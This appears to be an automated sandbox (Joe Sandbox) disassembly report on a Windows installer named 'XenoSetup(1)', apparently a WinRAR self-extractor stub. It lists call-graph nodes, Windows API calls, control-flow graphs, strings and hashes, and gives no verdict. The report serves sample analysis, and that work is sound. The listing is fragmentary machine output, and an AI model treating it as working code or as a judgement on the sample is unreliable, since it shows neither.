24972->24986 24991 1003b43 DeleteCriticalSection 24974->24991 24975->24962 24977 1002b8c 24975->24977 25007 1003c57 24977->25007 24980 1002ba1 24980->24964 24982 1002baf 24983 1002bbc 24982->24983 25013 1002bbf 6 API calls ___vcrt_FlsFree 24982->25013 24983->24964 24985->24962 24992 1003c0d 24986->24992 24989 1003d7e InitializeCriticalSectionAndSpinCount 24990 1003d69 24989->24990 24990->24972 24991->24975 24993 1003c4f 24992->24993 24994 1003c26 24992->24994 24993->24989 24993->24990 24994->24993 24999 1003b72 24994->24999 24997 1003c3b GetProcAddress 24997->24993 24998 1003c49 24997->24998 24998->24993 25005 1003b7e ___vcrt_FlsFree 24999->25005 25000 1003b95 LoadLibraryExW 25002 1003bb3 GetLastError 25000->25002 25003 1003bfa 25000->25003 25001 1003bf3 25001->24993 25001->24997 25002->25005 25003->25001 25004 1003c02 FreeLibrary 25003->25004 25004->25001 25005->25000 25005->25001 25006 1003bd5 LoadLibraryExW 25005->25006 25006->25003 25006->25005 25008 1003c0d ___vcrt_FlsFree 5 API calls 25007->25008 25009 1003c71 25008->25009 25010 1003c8a TlsAlloc 25009->25010 25011 1002b96 25009->25011 25011->24980 25012 1003d08 6 API calls ___vcrt_FlsFree 25011->25012 25012->24982 25013->24980 25016 100c073 25014->25016 25018 100c077 25014->25018 25015 fffbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25017 ffeefe 25015->25017 25016->25015 25017->24891 25017->24970 25018->25016 25020 100a6a0 25018->25020 25021 100a6ac __FrameHandler3::FrameUnwindToState 25020->25021 25032 100ac31 EnterCriticalSection 25021->25032 25023 100a6b3 25033 100c528 25023->25033 25025 100a6c2 25030 100a6d1 25025->25030 25046 100a529 29 API calls 25025->25046 25028 100a6cc 25047 100a5df GetStdHandle GetFileType 25028->25047 25048 100a6ed LeaveCriticalSection _abort 25030->25048 25031 100a6e2 _abort 25031->25018 25032->25023 25034 100c534 __FrameHandler3::FrameUnwindToState 25033->25034 25035 100c541 25034->25035 25036 100c558 25034->25036 25057 10091a8 20 API calls __dosmaperr 25035->25057 25049 100ac31 EnterCriticalSection 25036->25049 25039 100c546 25058 1009087 26 API calls _abort 25039->25058 25040 100c564 25045 100c590 25040->25045 25050 100c479 25040->25050 25042 100c550 _abort 25042->25025 25059 100c5b7 LeaveCriticalSection _abort 25045->25059 25046->25028 25047->25030 25048->25031 25049->25040 25051 100b136 __dosmaperr 20 API calls 25050->25051 25052 100c48b 25051->25052 25056 100c498 25052->25056 25060 100af0a 25052->25060 25053 1008dcc _free 20 API calls 25055 100c4ea 25053->25055 25055->25040 25056->25053 25057->25039 25058->25042 25059->25042 25061 100ac98 __dosmaperr 5 API calls 25060->25061 25062 100af31 25061->25062 25063 100af4f InitializeCriticalSectionAndSpinCount 25062->25063 25064 100af3a 25062->25064 25063->25064 25065 fffbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25064->25065 25066 100af66 25065->25066 25066->25052 25068 ffec50 25067->25068 25069 ff086d GetModuleHandleW 25068->25069 25070 ff0888 GetProcAddress 25069->25070 25071 ff08e7 25069->25071 25073 ff08b9 GetProcAddress 25070->25073 25074 ff08a1 25070->25074 25072 ff0c14 GetModuleFileNameW 25071->25072 25172 10075fb 42 API calls 2 library calls 25071->25172 25083 ff0c32 25072->25083 25076 ff08cb 25073->25076 25074->25073 25076->25071 25077 ff0b54 25077->25072 25078 ff0b5f GetModuleFileNameW CreateFileW 25077->25078 25079 ff0b8f SetFilePointer 25078->25079 25080 ff0c08 CloseHandle 25078->25080 25079->25080 25081 ff0b9d ReadFile 25079->25081 25080->25072 25081->25080 25084 ff0bbb 25081->25084 25086 ff0c94 GetFileAttributesW 25083->25086 25087 ff0cac 25083->25087 25089 ff0c5d CompareStringW 25083->25089 25163 feb146 25083->25163 25166 ff081b 25083->25166 25084->25080 25088 ff081b 2 API calls 25084->25088 25086->25083 25086->25087 25090 ff0cb7 25087->25090 25093 ff0cec 25087->25093 25088->25084 25089->25083 25092 ff0cd0 GetFileAttributesW 25090->25092 25095 ff0ce8 25090->25095 25091 ff0dfb 25115 ffa64d GetCurrentDirectoryW 25091->25115 25092->25090 25092->25095 25093->25091 25094 feb146 GetVersionExW 25093->25094 25096 ff0d06 25094->25096 25095->25093 25097 ff0d0d 25096->25097 25098 ff0d73 25096->25098 25100 ff081b 2 API calls 25097->25100 25099 fe4092 _swprintf 51 API calls 25098->25099 25101 ff0d9b AllocConsole 25099->25101 25102 ff0d17 25100->25102 25103 ff0da8 GetCurrentProcessId AttachConsole 25101->25103 25104 ff0df3 ExitProcess 25101->25104 25105 ff081b 2 API calls 25102->25105 25173 1003e13 25103->25173 25107 ff0d21 25105->25107 25109 fee617 53 API calls 25107->25109 25108 ff0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25108->25104 25110 ff0d3c 25109->25110 25111 fe4092 _swprintf 51 API calls 25110->25111 25112 ff0d4f 25111->25112 25113 fee617 53 API calls 25112->25113 25114 ff0d5e 25113->25114 25114->25104 25115->24908 25117 ff081b 2 API calls 25116->25117 25118 ffac2a OleInitialize 25117->25118 25119 ffac4d GdiplusStartup SHGetMalloc 25118->25119 25119->24910 25124 ffc5ce 25120->25124 25121 ffc6e4 25121->24919 25121->24920 25122 ff1fac CharUpperW 25122->25124 25124->25121 25124->25122 25175 fef3fa 82 API calls 2 library calls 25124->25175 25126 ffec50 25125->25126 25127 ffdbeb SetEnvironmentVariableW 25126->25127 25129 ffdc0e 25127->25129 25128 ffdc36 25128->24913 25129->25128 25130 ffdc2a SetEnvironmentVariableW 25129->25130 25130->25128 25132 ffb6fe 25131->25132 25133 ffb70b GetObjectW 25131->25133 25176 ffa6c2 FindResourceW 25132->25176 25135 ffb71a 25133->25135 25137 ffa5c6 4 API calls 25135->25137 25138 ffb72d 25137->25138 25139 ffb770 25138->25139 25140 ffb74c 25138->25140 25142 ffa6c2 13 API calls 25138->25142 25150 feda42 25139->25150 25192 ffa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25140->25192 25143 ffb73d 25142->25143 25143->25140 25145 ffb743 DeleteObject 25143->25145 25144 ffb754 25193 ffa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25144->25193 25145->25140 25147 ffb75d 25194 ffa80c 8 API calls 25147->25194 25149 ffb764 DeleteObject 25149->25139 25203 feda67 25150->25203 25155 ff90b7 25156 ffeb38 8 API calls 25155->25156 25157 ff90d6 25156->25157 25157->24932 25159 ffacab GdiplusShutdown CoUninitialize 25158->25159 25159->24948 25161->24939 25162->24946 25164 feb15a GetVersionExW 25163->25164 25165 feb196 25163->25165 25164->25165 25165->25083 25167 ffec50 25166->25167 25168 ff0828 GetSystemDirectoryW 25167->25168 25169 ff085e 25168->25169 25170 ff0840 25168->25170 25169->25083 25171 ff0851 LoadLibraryW 25170->25171 25171->25169 25172->25077 25174 1003e1b 25173->25174 25174->25108 25174->25174 25175->25124 25177 ffa7d3 25176->25177 25178 ffa6e5 SizeofResource 25176->25178 25177->25133 25177->25135 25178->25177 25179 ffa6fc LoadResource 25178->25179 25179->25177 25180 ffa711 LockResource 25179->25180 25180->25177 25181 ffa722 GlobalAlloc 25180->25181 25181->25177 25182 ffa73d GlobalLock 25181->25182 25183 ffa7cc GlobalFree 25182->25183 25184 ffa74c __InternalCxxFrameHandler 25182->25184 25183->25177 25185 ffa754 CreateStreamOnHGlobal 25184->25185 25186 ffa76c 25185->25186 25187 ffa7c5 GlobalUnlock 25185->25187 25195 ffa626 GdipAlloc 25186->25195 25187->25183 25190 ffa79a GdipCreateHBITMAPFromBitmap 25191 ffa7b0 25190->25191 25191->25187 25192->25144 25193->25147 25194->25149 25196 ffa638 25195->25196 25197 ffa645 25195->25197 25199 ffa3b9 25196->25199 25197->25187 25197->25190 25197->25191 25200 ffa3da GdipCreateBitmapFromStreamICM 25199->25200 25201 ffa3e1 GdipCreateBitmapFromStream 25199->25201 25202 ffa3e6 25200->25202 25201->25202 25202->25197 25204 feda75 __EH_prolog 25203->25204 25205 fedaa4 GetModuleFileNameW 25204->25205 25206 fedad5 25204->25206 25207 fedabe 25205->25207 25249 fe98e0 25206->25249 25207->25206 25209 fedb31 25260 1006310 25209->25260 25210 fe959a 80 API calls 25212 feda4e 25210->25212 25211 fee261 78 API calls 25214 fedb05 25211->25214 25247 fee29e GetModuleHandleW FindResourceW 25212->25247 25214->25209 25214->25211 25227 fedd4a 25214->25227 25215 fedb44 25216 1006310 26 API calls 25215->25216 25224 fedb56 ___vcrt_FlsFree 25216->25224 25217 fedc85 25217->25227 25280 fe9d70 81 API calls 25217->25280 25218 fe9e80 79 API calls 25218->25224 25221 fedc9f ___std_exception_copy 25222 fe9bd0 82 API calls 25221->25222 25221->25227 25225 fedcc8 ___std_exception_copy 25222->25225 25224->25217 25224->25218 25224->25227 25274 fe9bd0 25224->25274 25279 fe9d70 81 API calls 25224->25279 25225->25227 25245 fedcd3 _wcslen ___std_exception_copy ___vcrt_FlsFree 25225->25245 25281 ff1b84 MultiByteToWideChar 25225->25281 25227->25210 25228 fee159 25233 fee1de 25228->25233 25287 1008cce 26 API calls 2 library calls 25228->25287 25231 fee16e 25288 1007625 26 API calls 2 library calls 25231->25288 25232 fee1c6 25289 fee27c 78 API calls 25232->25289 25234 fee214 25233->25234 25239 fee261 78 API calls 25233->25239 25237 1006310 26 API calls 25234->25237 25238 fee22d 25237->25238 25240 1006310 26 API calls 25238->25240 25239->25233 25240->25227 25242 ff1da7 WideCharToMultiByte 25242->25245 25245->25227 25245->25228 25245->25242 25282 fee5b1 50 API calls __vsnprintf 25245->25282 25283 1006159 26 API calls 3 library calls 25245->25283 25284 1008cce 26 API calls 2 library calls 25245->25284 25285 1007625 26 API calls 2 library calls 25245->25285 25286 fee27c 78 API calls 25245->25286 25248 feda55 25247->25248 25248->25155 25251 fe98ea 25249->25251 25250 fe994b CreateFileW 25252 fe996c GetLastError 25250->25252 25254 fe99bb 25250->25254 25251->25250 25253 febb03 GetCurrentDirectoryW 25252->25253 25255 fe998c 25253->25255 25256 fe99ff 25254->25256 25258 fe99e5 SetFileTime 25254->25258 25255->25254 25257 fe9990 CreateFileW GetLastError 25255->25257 25256->25214 25257->25254 25259 fe99b5 25257->25259 25258->25256 25259->25254 25261 1006349 25260->25261 25262 100634d 25261->25262 25273 1006375 25261->25273 25290 10091a8 20 API calls __dosmaperr 25262->25290 25264 1006699 25266 fffbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25264->25266 25265 1006352 25291 1009087 26 API calls _abort 25265->25291 25268 10066a6 25266->25268 25268->25215 25269 100635d 25270 fffbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25269->25270 25272 1006369 25270->25272 25272->25215 25273->25264 25292 1006230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25273->25292 25275 fe9be3 25274->25275 25276 fe9bdc 25274->25276 25275->25276 25278 fe9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25275->25278 25293 fe6d1a 77 API calls 25275->25293 25276->25224 25278->25275 25279->25224 25280->25221 25281->25245 25282->25245 25283->25245 25284->25245 25285->25245 25286->25245 25287->25231 25288->25232 25289->25233 25290->25265 25291->25269 25292->25273 25293->25275 25295 1007ce1 _abort 25294->25295 25296 1007ce8 25295->25296 25297 1007cfa 25295->25297 25330 1007e2f GetModuleHandleW 25296->25330 25318 100ac31 EnterCriticalSection 25297->25318 25300 1007ced 25300->25297 25331 1007e73 GetModuleHandleExW 25300->25331 25301 1007d01 25305 1007d76 25301->25305 25315 1007d9f 25301->25315 25339 10087e0 20 API calls _abort 25301->25339 25309 1007d8e 25305->25309 25314 1008a91 _abort 5 API calls 25305->25314 25307 1007de8 25340 1012390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25307->25340 25308 1007dbc 25322 1007dee 25308->25322 25310 1008a91 _abort 5 API calls 25309->25310 25310->25315 25314->25309 25319 1007ddf 25315->25319 25318->25301 25341 100ac81 LeaveCriticalSection 25319->25341 25321 1007db8 25321->25307 25321->25308 25342 100b076 25322->25342 25325 1007e1c 25328 1007e73 _abort 8 API calls 25325->25328 25326 1007dfc GetPEB 25326->25325 25327 1007e0c GetCurrentProcess TerminateProcess 25326->25327 25327->25325 25329 1007e24 ExitProcess 25328->25329 25330->25300 25332 1007ec0 25331->25332 25333 1007e9d GetProcAddress 25331->25333 25334 1007ec6 FreeLibrary 25332->25334 25335 1007ecf 25332->25335 25336 1007eb2 25333->25336 25334->25335 25337 fffbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25335->25337 25336->25332 25338 1007cf9 25337->25338 25338->25297 25339->25305 25341->25321 25343 100b091 25342->25343 25344 100b09b 25342->25344 25346 fffbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25343->25346 25345 100ac98 __dosmaperr 5 API calls 25344->25345 25345->25343 25347 1007df8 25346->25347 25347->25325 25347->25326 25348 ffe5b1 25349 ffe578 25348->25349 25349->25348 25350 ffe85d ___delayLoadHelper2@8 14 API calls 25349->25350 25350->25349 25466 ffb1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25352 100c051 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25467 fe6faa 111 API calls 3 library calls 25468 ffeda7 48 API calls _unexpected 25414 ffdca1 DialogBoxParamW 25469 fff3a0 27 API calls 25470 1008268 55 API calls _free 25416 1007f6e 52 API calls 3 library calls 25471 ffb18d 78 API calls 25417 ffc793 97 API calls 4 library calls 25418 ffc793 102 API calls 4 library calls 25472 ff9580 6 API calls 23454 fe9f7a 23455 fe9f8f 23454->23455 23456 fe9f88 23454->23456 23457 fe9f9c GetStdHandle 23455->23457 23461 fe9fab 23455->23461 23457->23461 23458 fea003 WriteFile 23458->23461 23459 fe9fcf 23460 fe9fd4 WriteFile 23459->23460 23459->23461 23460->23459 23460->23461 23461->23456 23461->23458 23461->23459 23461->23460 23463 fea095 23461->23463 23465 fe6baa 78 API calls 23461->23465 23466 fe6e98 77 API calls 23463->23466 23465->23461 23466->23456 23468 fe9a74 23472 fe9a7e 23468->23472 23469 fe9ab1 23470 fe9b9d SetFilePointer 23470->23469 23471 fe9bb6 GetLastError 23470->23471 23471->23469 23472->23469 23472->23470 23473 fe9b79 23472->23473 23475 fe981a 23472->23475 23473->23470 23476 fe9833 23475->23476 23479 fe9e80 23476->23479 23480 fe9e92 23479->23480 23485 fe9ea5 23479->23485 23482 fe9865 23480->23482 23488 fe6d5b 77 API calls 23480->23488 23481 fe9eb8 SetFilePointer 23481->23482 23484 fe9ed4 GetLastError 23481->23484 23482->23473 23484->23482 23486 fe9ede 23484->23486 23485->23481 23485->23482 23486->23482 23489 fe6d5b 77 API calls 23486->23489 23488->23485 23489->23482 25425 fe1075 84 API calls 25473 fe1f72 128 API calls __EH_prolog 25426 ffa070 10 API calls 25428 ffb270 99 API calls 25429 ffc793 107 API calls 4 library calls 23494 ffe569 23495 ffe517 23494->23495 23495->23494 23497 ffe85d 23495->23497 23523 ffe5bb 23497->23523 23499 ffe86d 23500 ffe8ee 23499->23500 23501 ffe8ca 23499->23501 23504 ffe966 LoadLibraryExA 23500->23504 23506 ffe9c7 23500->23506 23509 ffe9d9 23500->23509 23512 ffea95 23500->23512 23502 ffe7fb DloadReleaseSectionWriteAccess 6 API calls 23501->23502 23503 ffe8d5 RaiseException 23502->23503 23519 ffeac3 23503->23519 23505 ffe979 GetLastError 23504->23505 23504->23506 23507 ffe9a2 23505->23507 23514 ffe98c 23505->23514 23506->23509 23510 ffe9d2 FreeLibrary 23506->23510 23511 ffe7fb DloadReleaseSectionWriteAccess 6 API calls 23507->23511 23508 ffea37 GetProcAddress 23508->23512 23513 ffea47 GetLastError 23508->23513 23509->23508 23509->23512 23510->23509 23515 ffe9ad RaiseException 23511->23515 23532 ffe7fb 23512->23532 23516 ffea5a 23513->23516 23514->23506 23514->23507 23515->23519 23516->23512 23518 ffe7fb DloadReleaseSectionWriteAccess 6 API calls 23516->23518 23520 ffea7b RaiseException 23518->23520 23519->23495 23521 ffe5bb ___delayLoadHelper2@8 6 API calls 23520->23521 23522 ffea92 23521->23522 23522->23512 23524 ffe5ed 23523->23524 23525 ffe5c7 23523->23525 23524->23499 23540 ffe664 23525->23540 23527 ffe5cc 23528 ffe5e8 23527->23528 23543 ffe78d 23527->23543 23548 ffe5ee GetModuleHandleW GetProcAddress GetProcAddress 23528->23548 23531 ffe836 23531->23499 23533 ffe82f 23532->23533 23534 ffe80d 23532->23534 23533->23519 23535 ffe664 DloadReleaseSectionWriteAccess 3 API calls 23534->23535 23536 ffe812 23535->23536 23537 ffe82a 23536->23537 23538 ffe78d DloadProtectSection 3 API calls 23536->23538 23551 ffe831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23537->23551 23538->23537 23549 ffe5ee GetModuleHandleW GetProcAddress GetProcAddress 23540->23549 23542 ffe669 23542->23527 23546 ffe7a2 DloadProtectSection 23543->23546 23544 ffe7a8 23544->23528 23545 ffe7dd VirtualProtect 23545->23544 23546->23544 23546->23545 23550 ffe6a3 VirtualQuery GetSystemInfo 23546->23550 23548->23531 23549->23542 23550->23545 23551->23533 25477 100a4a0 71 API calls _free 25478 10108a0 IsProcessorFeaturePresent 24610 ffcd58 24612 ffcd7b 24610->24612 24613 ffce22 24610->24613 24611 ffb314 ExpandEnvironmentStringsW 24623 ffc793 _wcslen _wcsrchr 24611->24623 24612->24613 24617 ff1fbb CompareStringW 24612->24617 24613->24623 24638 ffd78f 24613->24638 24615 ffd40a 24617->24612 24618 ffca67 SetWindowTextW 24618->24623 24621 1003e3e 22 API calls 24621->24623 24623->24611 24623->24615 24623->24618 24623->24621 24624 ffc855 SetFileAttributesW 24623->24624 24629 ffcc31 GetDlgItem SetWindowTextW SendMessageW 24623->24629 24632 ffcc71 SendMessageW 24623->24632 24637 ff1fbb CompareStringW 24623->24637 24662 ffa64d GetCurrentDirectoryW 24623->24662 24664 fea5d1 6 API calls 24623->24664 24665 fea55a FindClose 24623->24665 24666 ffb48e 76 API calls 2 library calls 24623->24666 24626 ffc90f GetFileAttributesW 24624->24626 24636 ffc86f _abort _wcslen 24624->24636 24626->24623 24628 ffc921 DeleteFileW 24626->24628 24628->24623 24630 ffc932 24628->24630 24629->24623 24631 fe4092 _swprintf 51 API calls 24630->24631 24633 ffc952 GetFileAttributesW 24631->24633 24632->24623 24633->24630 24634 ffc967 MoveFileW 24633->24634 24634->24623 24635 ffc97f MoveFileExW 24634->24635 24635->24623 24636->24623 24636->24626 24663 feb991 51 API calls 2 library calls 24636->24663 24637->24623 24640 ffd799 _abort _wcslen 24638->24640 24639 ffd9e7 24639->24623 24640->24639 24641 ffd8a5 24640->24641 24642 ffd9c0 24640->24642 24667 ff1fbb CompareStringW 24640->24667 24644 fea231 3 API calls 24641->24644 24642->24639 24646 ffd9de ShowWindow 24642->24646 24645 ffd8ba 24644->24645 24647 ffd8d9 ShellExecuteExW 24645->24647 24668 feb6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24645->24668 24646->24639 24647->24639 24654 ffd8ec 24647->24654 24649 ffd8d1 24649->24647 24650 ffd925 24669 ffdc3b 6 API calls 24650->24669 24651 ffd97b CloseHandle 24652 ffd989 24651->24652 24653 ffd994 24651->24653 24670 ff1fbb CompareStringW 24652->24670 24653->24642 24654->24650 24654->24651 24656 ffd91b ShowWindow 24654->24656 24656->24650 24658 ffd93d 24658->24651 24659 ffd950 GetExitCodeProcess 24658->24659 24659->24651 24660 ffd963 24659->24660 24660->24651 24662->24623 24663->24636 24664->24623 24665->24623 24666->24623 24667->24641 24668->24649 24669->24658 24670->24653 25432 ffe455 14 API calls ___delayLoadHelper2@8 25434 100b1b8 27 API calls 3 library calls 25436 ffa440 GdipCloneImage GdipAlloc 25481 fff530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25482 ffff30 LocalFree 25438 100a3d0 21 API calls 2 library calls 25439 1012bd0 VariantClear 25484 1000ada 51 API calls 2 library calls 25441 fe1025 29 API calls 25442 ffc220 93 API calls _swprintf 25485 100bee0 GetCommandLineA GetCommandLineW 25488 fe1710 86 API calls 25489 ffad10 73 API calls 25366 10098f0 25374 100adaf 25366->25374 25370 100990c 25371 1009919 25370->25371 25382 1009920 11 API calls 25370->25382 25373 1009904 25375 100ac98 __dosmaperr 5 API calls 25374->25375 25376 100add6 25375->25376 25377 100adee TlsAlloc 25376->25377 25378 100addf 25376->25378 25377->25378 25379 fffbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25378->25379 25380 10098fa 25379->25380 25380->25373 25381 1009869 20 API calls 2 library calls 25380->25381 25381->25370 25382->25373 25383 100abf0 25386 100abfb 25383->25386 25384 100af0a 11 API calls 25384->25386 25385 100ac24 25389 100ac50 DeleteCriticalSection 25385->25389 25386->25384 25386->25385 25387 100ac20 25386->25387 25389->25387 25490 10088f0 7 API calls ___scrt_uninitialize_crt 25491 1002cfb 38 API calls 4 library calls 25445 ffa400 GdipDisposeImage GdipFree 25446 ffd600 70 API calls

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00FF0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00FF087C
                                                                                        • Part of subcall function 00FF0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00FF088E
                                                                                        • Part of subcall function 00FF0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00FF08BF
                                                                                        • Part of subcall function 00FFA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00FFA655
                                                                                        • Part of subcall function 00FFAC16: OleInitialize.OLE32(00000000), ref: 00FFAC2F
                                                                                        • Part of subcall function 00FFAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00FFAC66
                                                                                        • Part of subcall function 00FFAC16: SHGetMalloc.SHELL32(01028438), ref: 00FFAC70
                                                                                      • GetCommandLineW.KERNEL32 ref: 00FFDF5C
                                                                                      • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00FFDF83
                                                                                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00FFDF94
                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00FFDFCE
                                                                                        • Part of subcall function 00FFDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00FFDBF4
                                                                                        • Part of subcall function 00FFDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00FFDC30
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00FFDFD7
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,0103EC90,00000800), ref: 00FFDFF2
                                                                                      • SetEnvironmentVariableW.KERNEL32(sfxname,0103EC90), ref: 00FFDFFE
                                                                                      • GetLocalTime.KERNEL32(?), ref: 00FFE009
                                                                                      • _swprintf.LIBCMT ref: 00FFE048
                                                                                      • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00FFE05A
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00FFE061
                                                                                      • LoadIconW.USER32(00000000,00000064), ref: 00FFE078
                                                                                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00FFE0C9
                                                                                      • Sleep.KERNEL32(?), ref: 00FFE0F7
                                                                                      • DeleteObject.GDI32 ref: 00FFE130
                                                                                      • DeleteObject.GDI32(?), ref: 00FFE140
                                                                                      • CloseHandle.KERNEL32 ref: 00FFE183
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                      • API String ID: 3049964643-277078469
                                                                                      • Opcode ID: 99ab666994fc45a62e1e0c9646563c7c0cab34799f234ff916294947cbfa4c73
                                                                                      • Instruction ID: 4938fa983b8cf0ab6d2be408eb768cae30dd8b60d39a2e23200337302d8851c4
                                                                                      • Opcode Fuzzy Hash: 99ab666994fc45a62e1e0c9646563c7c0cab34799f234ff916294947cbfa4c73
                                                                                      • Instruction Fuzzy Hash: 3161D171904258ABD330AFA5ED89F7B37ECBF85710F000429FAC5961A5DBBE9804D762

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 812 ffa6c2-ffa6df FindResourceW 813 ffa7db 812->813 814 ffa6e5-ffa6f6 SizeofResource 812->814 815 ffa7dd-ffa7e1 813->815 814->813 816 ffa6fc-ffa70b LoadResource 814->816 816->813 817 ffa711-ffa71c LockResource 816->817 817->813 818 ffa722-ffa737 GlobalAlloc 817->818 819 ffa73d-ffa746 GlobalLock 818->819 820 ffa7d3-ffa7d9 818->820 821 ffa7cc-ffa7cd GlobalFree 819->821 822 ffa74c-ffa76a call 1000320 CreateStreamOnHGlobal 819->822 820->815 821->820 825 ffa76c-ffa78e call ffa626 822->825 826 ffa7c5-ffa7c6 GlobalUnlock 822->826 825->826 831 ffa790-ffa798 825->831 826->821 832 ffa79a-ffa7ae GdipCreateHBITMAPFromBitmap 831->832 833 ffa7b3-ffa7c1 831->833 832->833 834 ffa7b0 832->834 833->826 834->833
                                                                                      APIs
                                                                                      • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00FFB73D,00000066), ref: 00FFA6D5
                                                                                      • SizeofResource.KERNEL32(00000000,?,?,?,00FFB73D,00000066), ref: 00FFA6EC
                                                                                      • LoadResource.KERNEL32(00000000,?,?,?,00FFB73D,00000066), ref: 00FFA703
                                                                                      • LockResource.KERNEL32(00000000,?,?,?,00FFB73D,00000066), ref: 00FFA712
                                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00FFB73D,00000066), ref: 00FFA72D
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00FFA73E
                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00FFA762
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00FFA7C6
                                                                                        • Part of subcall function 00FFA626: GdipAlloc.GDIPLUS(00000010), ref: 00FFA62C
                                                                                      • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00FFA7A7
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00FFA7CD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                      • String ID: PNG
                                                                                      • API String ID: 211097158-364855578
                                                                                      • Opcode ID: d99e721871c4606ce6ba0885deaf48ad294c933fdb6958067979fd2fab558b6a
                                                                                      • Instruction ID: a2ae3689ece613199a494faff6e2c1da8514d3e7f5ea9f356b9ac469f5bb335a
                                                                                      • Opcode Fuzzy Hash: d99e721871c4606ce6ba0885deaf48ad294c933fdb6958067979fd2fab558b6a
                                                                                      • Instruction Fuzzy Hash: 9D3186B6A00306AFD7216F21DC88D2B7FB9FF84770B140519F94996224EB7AD804DB51

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
